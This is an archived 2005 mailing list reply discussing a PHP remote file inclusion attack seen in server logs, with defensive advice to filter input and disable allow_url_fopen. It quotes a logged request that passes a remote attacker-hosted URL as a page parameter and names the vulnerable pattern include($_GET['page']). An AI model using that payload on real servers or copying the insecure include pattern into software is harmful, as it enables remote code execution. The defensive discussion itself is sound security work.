lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <42EA997C.3080504@hardened-php.net>
Date: Fri Jul 29 22:03:12 2005
From: christopher.kunz at hardened-php.net (Christopher Kunz)
Subject: PHP Command/Safemode Exploit

Willem Koenings wrote:
> hi,
> 
> looks like CSE exploit is circulating again...
> found several queries today from server log
> anyone confirms?
> 
> "GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404
> 1035 "-" "Python-urllib/2.4"

Can't see anything new in there. The usual PHP exploit suite, which is very 
script kiddie compatible, but where do you suspect a new exploit? AFAICT, this 
is targetted to sites using stuff like

include($_GET['page'])

as their action dispatch inside the script.

If you filter user input correctly, there's absolutely nothing to worry. You 
might, however, want to check out the Hardening Patch for PHP 
(http://www.hardened-php.net/, shameless plug) which permits include() for any 
URL, or disable allow_url_fopen in php.ini.

Regards,

--ck

PS: The site with cse.gif on it is down now.

Powered by blists - more mailing lists